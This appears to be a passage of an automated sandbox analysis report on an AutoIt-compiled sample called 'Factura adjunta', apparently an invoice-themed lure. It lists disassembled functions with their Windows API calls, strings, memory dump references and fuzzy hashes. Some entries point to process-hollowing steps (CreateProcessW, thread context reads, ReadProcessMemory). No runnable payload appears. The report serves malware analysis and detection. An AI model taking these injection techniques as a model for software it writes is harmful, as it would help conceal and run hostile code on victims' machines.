                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Window$CreateShow
                            • String ID: AutoIt v3$edit
                            • API String ID: 1584632944-3779509399
                            • Opcode ID: 45f0c288efba7f0763ac1c49646eeaff722fbfd75472704a4125c14d5fb82c4e
                            • Instruction ID: 7d42e483459f9ab4aef2562b716b359de61c9faacac13d075975d83df33d93da
                            • Opcode Fuzzy Hash: 45f0c288efba7f0763ac1c49646eeaff722fbfd75472704a4125c14d5fb82c4e
                            • Instruction Fuzzy Hash: E5F03070A102907EEA7017136C0DE273E7DF7C6F60F000029BE08A2276D6A548A0DEB0
                            Function 007623B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 144fileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1142 7623b0-7624dd call 760000 call 7622a0 CreateFileW 1149 7624e4-7624f4 1142->1149 1150 7624df 1142->1150 1153 7624f6 1149->1153 1154 7624fb-762515 VirtualAlloc 1149->1154 1151 762594-762599 1150->1151 1153->1151 1155 762517 1154->1155 1156 762519-762530 ReadFile 1154->1156 1155->1151 1157 762534-76256e call 7622e0 call 7612a0 1156->1157 1158 762532 1156->1158 1163 762570-762585 call 762330 1157->1163 1164 76258a-762592 ExitProcess 1157->1164 1158->1151 1163->1164 1164->1151
                            APIs
                              • Part of subcall function 007622A0: Sleep.KERNELBASE(000001F4), ref: 007622B1
                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 007624D3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198887255.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_760000_Factura adjunta.jbxd
                            Similarity
                            • API ID: CreateFileSleep
                            • String ID: X5HA6ZVBT9PL
                            • API String ID: 2694422964-3405530902
                            • Opcode ID: e0c620114f274ab581fd24e36ff824bf628e8dbca75978ace7d9b2f20c039e13
                            • Instruction ID: 6d4fa831206cbcb64cda445bfdce9936d2a55a0aaff47abc1d3078bae0c591ea
                            • Opcode Fuzzy Hash: e0c620114f274ab581fd24e36ff824bf628e8dbca75978ace7d9b2f20c039e13
                            • Instruction Fuzzy Hash: 18519330D14248EBEF15DBE4C815BEEBB79AF58300F104199E609BB2C1DA791F45CBA5
                            Function 007B410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                            Download Yara Rule
                            APIs
                            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 007ED5EC
                              • Part of subcall function 007B7D2C: _memmove.LIBCMT ref: 007B7D66
                            • _memset.LIBCMT ref: 007B418D
                            • _wcscpy.LIBCMT ref: 007B41E1
                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007B41F1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                            • String ID: Line:
                            • API String ID: 3942752672-1585850449
                            • Opcode ID: 1f6b9febbb2bd7110d383e029899f0007aa33c6b8dbac4d1851d77e3282d475c
                            • Instruction ID: 3e0b748679e37a044be98903069e2036c3373b5adeb6393d2fe0d1ead4a6f465
                            • Opcode Fuzzy Hash: 1f6b9febbb2bd7110d383e029899f0007aa33c6b8dbac4d1851d77e3282d475c
                            • Instruction Fuzzy Hash: 1A31B771408309AAD765EB64DC4AFDB77ECBF84300F10451EF19992192EB789A58CB93
                            Function 007D564D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                            • String ID:
                            • API String ID: 1559183368-0
                            • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                            • Instruction ID: cf8c0d70bcbfe6805c404751b03a16b2437c3c22ad0b358a1a21732a22553ef3
                            • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                            • Instruction Fuzzy Hash: 5D518D30A00B09DBDB248FB9C88466EBBB6AF40730F74872BE825963D0D778DD508B50
                            Function 007B69CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 007B4F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,008762F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 007B4F6F
                            • _free.LIBCMT ref: 007EE68C
                            • _free.LIBCMT ref: 007EE6D3
                              • Part of subcall function 007B6BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 007B6D0D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: _free$CurrentDirectoryLibraryLoad
                            • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                            • API String ID: 2861923089-1757145024
                            • Opcode ID: 14fc8b46463fc043a698affeeb970ef56e171299a2665bd8a4b370191c301b11
                            • Instruction ID: abd3175ea1952a56b17869cfb49ad3ce1b6a7c2f81a9583df3cfca8cd400775f
                            • Opcode Fuzzy Hash: 14fc8b46463fc043a698affeeb970ef56e171299a2665bd8a4b370191c301b11
                            • Instruction Fuzzy Hash: 06916C71910259EFCF04EFA9CC95AEDB7B4FF19310F14482AF815AB2A1EB389905CB50
                            Function 007B35B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,007B35A1,SwapMouseButtons,00000004,?), ref: 007B35D4
                            • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,007B35A1,SwapMouseButtons,00000004,?,?,?,?,007B2754), ref: 007B35F5
                            • RegCloseKey.KERNELBASE(00000000,?,?,007B35A1,SwapMouseButtons,00000004,?,?,?,?,007B2754), ref: 007B3617
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: CloseOpenQueryValue
                            • String ID: Control Panel\Mouse
                            • API String ID: 3677997916-824357125
                            • Opcode ID: e6d945936beb50c1008fa3fe083b1c33348b9fe3779e64988c7fa0604337716d
                            • Instruction ID: cceca4aa6a8477670060d106561a33d402c6f7ce2dabe183293970aa5e2af4b4
                            • Opcode Fuzzy Hash: e6d945936beb50c1008fa3fe083b1c33348b9fe3779e64988c7fa0604337716d
                            • Instruction Fuzzy Hash: D0115AB5910208FFDB208F68DC80EEEB7B8EF44744F005869F905D7210E2759F8097A0
                            Function 007612A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                            Download Yara Rule
                            APIs
                            • CreateProcessW.KERNELBASE(?,00000000), ref: 00761ACD
                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00761AF1
                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00761B13
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198887255.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_760000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                            • String ID:
                            • API String ID: 2438371351-0
                            • Opcode ID: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                            • Instruction ID: 03600b80f08b66936ffa735cc9328103c85988037c6e919e8374a3e49cdb3604
                            • Opcode Fuzzy Hash: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                            • Instruction Fuzzy Hash: 72622C30A14218DBEB24CFA4C854BDEB372EF58301F5491A9D50DEB390E77A9E81CB59
                            Function 008197E5 Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 007B5045: _fseek.LIBCMT ref: 007B505D
                              • Part of subcall function 008199BE: _wcscmp.LIBCMT ref: 00819AAE
                              • Part of subcall function 008199BE: _wcscmp.LIBCMT ref: 00819AC1
                            • _free.LIBCMT ref: 0081992C
                            • _free.LIBCMT ref: 00819933
                            • _free.LIBCMT ref: 0081999E
                              • Part of subcall function 007D2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,007D9C64), ref: 007D2FA9
                              • Part of subcall function 007D2F95: GetLastError.KERNEL32(00000000,?,007D9C64), ref: 007D2FBB
                            • _free.LIBCMT ref: 008199A6
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                            • String ID:
                            • API String ID: 1552873950-0
                            • Opcode ID: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                            • Instruction ID: 0e3aef2a0cd31dad1ad2ca43864c50ce306ae4000b2946505f08b4a6c528c662
                            • Opcode Fuzzy Hash: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                            • Instruction Fuzzy Hash: 715148B1A04218AFDF249F64DC85BDEBBB9EF48310F1004AEF249A7241DB355A818F59
                            Function 007D493A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                            • String ID:
                            • API String ID: 2782032738-0
                            • Opcode ID: 6b900c82ae833c016f0ad4fafe5841f230cacf6ecaddb2f96621bb99e00bcb06
                            • Instruction ID: cf6ed2c2a580a616fb9ea998ececb9b4a83f23ab2bb514d369fe5aed54cdd9ed
                            • Opcode Fuzzy Hash: 6b900c82ae833c016f0ad4fafe5841f230cacf6ecaddb2f96621bb99e00bcb06
                            • Instruction Fuzzy Hash: CA41B671640606ABDF28CFAAC89496F77B6EF84360B24C17FE855C7740E778AD408B54
                            Function 0081901B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: __fread_nolock_memmove
                            • String ID: EA06
                            • API String ID: 1988441806-3962188686
                            • Opcode ID: 85254b1201a7a492fcadce60920d60ff1f1a731c107c6e65ac0e35c35de77d1a
                            • Instruction ID: 54e431992b9198774504d2a757dba1e6484146b9392f1e8997bf08c1dae82a12
                            • Opcode Fuzzy Hash: 85254b1201a7a492fcadce60920d60ff1f1a731c107c6e65ac0e35c35de77d1a
                            • Instruction Fuzzy Hash: 7F01F971804258BEDB28C6A8CC1AEFEBBFCDF05301F00419BF592D2281E579A6049B60
                            Function 007D0FF6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                              • Part of subcall function 007D594C: __FF_MSGBANNER.LIBCMT ref: 007D5963
                              • Part of subcall function 007D594C: __NMSG_WRITE.LIBCMT ref: 007D596A
                              • Part of subcall function 007D594C: RtlAllocateHeap.NTDLL(00E80000,00000000,00000001), ref: 007D598F
                            • std::exception::exception.LIBCMT ref: 007D102C
                            • __CxxThrowException@8.LIBCMT ref: 007D1041
                              • Part of subcall function 007D87DB: RaiseException.KERNEL32(?,?,00000000,0086BAF8,?,00000001,?,?,?,007D1046,00000000,0086BAF8,007B9FEC,00000001), ref: 007D8830
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                            • String ID: bad allocation
                            • API String ID: 3902256705-2104205924
                            • Opcode ID: 5c5672b8f8e5adfe1cca20a8c4b3977f839ce4e703955a79e6aab5d05549ae19
                            • Instruction ID: 6020129f1146f04ca82ce7ac4a730eb087680b974279be283d2f039ff7c053d3
                            • Opcode Fuzzy Hash: 5c5672b8f8e5adfe1cca20a8c4b3977f839ce4e703955a79e6aab5d05549ae19
                            • Instruction Fuzzy Hash: 10F0D13450421DE7CB20BA98EC09ADE7BB8AF00364F500027F904E2381EBB88A8482A1
                            Function 00819B6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                            Download Yara Rule
                            APIs
                            • GetTempPathW.KERNEL32(00000104,?), ref: 00819B82
                            • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00819B99
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Temp$FileNamePath
                            • String ID: aut
                            • API String ID: 3285503233-3010740371
                            • Opcode ID: 3c91fc7cac19614352072b2f2620ad43dc57982bd5e23fe276ff6bf503ce6f25
                            • Instruction ID: fd605c43dff51e741bb7b1548fbb348e5712ad724130fa5f8ec6bc2f0a8456ff
                            • Opcode Fuzzy Hash: 3c91fc7cac19614352072b2f2620ad43dc57982bd5e23fe276ff6bf503ce6f25
                            • Instruction Fuzzy Hash: 5ED05E7994030DABDB109B90DC0EF9BB72CF744700F0046A1BF64D11A2DEB455988BD5
                            Function 0082CDF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 64563f4ea61fde80eeffef84a3d161f14123a2909f77841d210a26a6b03dc0c8
                            • Instruction ID: 0fbc4cecb7fbf0774bda37b468d4bb3ca1f24ee2c7bae0a3f241794f097d6d66
                            • Opcode Fuzzy Hash: 64563f4ea61fde80eeffef84a3d161f14123a2909f77841d210a26a6b03dc0c8
                            • Instruction Fuzzy Hash: E0F13370A08351DFCB14DF28C484A6ABBE5FF88314F14892EF9999B251D774E985CF82
                            Function 007B43DB Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 007B4401
                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 007B44A6
                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 007B44C3
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: IconNotifyShell_$_memset
                            • String ID:
                            • API String ID: 1505330794-0
                            • Opcode ID: 2d8e7f68acfa21eae3debbc7b12bd19f140e856ceabd2b05a7d4c22549d15f7c
                            • Instruction ID: 6c180245c3119987c3d5ecce599b5b8b1545e7b65be594e7ca93b84de281933d
                            • Opcode Fuzzy Hash: 2d8e7f68acfa21eae3debbc7b12bd19f140e856ceabd2b05a7d4c22549d15f7c
                            • Instruction Fuzzy Hash: FC3161705057418FD760DF24D8887D7BBF8FB49304F00092EF59A83252E779A954CB92
                            Function 007D594C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • __FF_MSGBANNER.LIBCMT ref: 007D5963
                              • Part of subcall function 007DA3AB: __NMSG_WRITE.LIBCMT ref: 007DA3D2
                              • Part of subcall function 007DA3AB: __NMSG_WRITE.LIBCMT ref: 007DA3DC
                            • __NMSG_WRITE.LIBCMT ref: 007D596A
                              • Part of subcall function 007DA408: GetModuleFileNameW.KERNEL32(00000000,008743BA,00000104,00000000,00000001,00000000), ref: 007DA49A
                              • Part of subcall function 007DA408: ___crtMessageBoxW.LIBCMT ref: 007DA548
                              • Part of subcall function 007D32DF: ___crtCorExitProcess.LIBCMT ref: 007D32E5
                              • Part of subcall function 007D32DF: ExitProcess.KERNEL32 ref: 007D32EE
                              • Part of subcall function 007D8D68: __getptd_noexit.LIBCMT ref: 007D8D68
                            • RtlAllocateHeap.NTDLL(00E80000,00000000,00000001), ref: 007D598F
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                            • String ID:
                            • API String ID: 1372826849-0
                            • Opcode ID: 034b69216bb55cea6a7a08c5a5d0cdc67671f5a3d013402d0b16e368f7e9a057
                            • Instruction ID: f8955c4c48e8d6f628c72a9c51a899758f35da38dad1bbbaec29a8eeaffb0cdb
                            • Opcode Fuzzy Hash: 034b69216bb55cea6a7a08c5a5d0cdc67671f5a3d013402d0b16e368f7e9a057
                            • Instruction Fuzzy Hash: 4E01D232340A15EFE6112B35E86AA2E7679AF51770F10012BF505AA3D2DF78ED4186A1
                            Function 00819B2C Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,008197D2,?,?,?,?,?,00000004), ref: 00819B45
                            • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,008197D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00819B5B
                            • CloseHandle.KERNEL32(00000000,?,008197D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00819B62
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
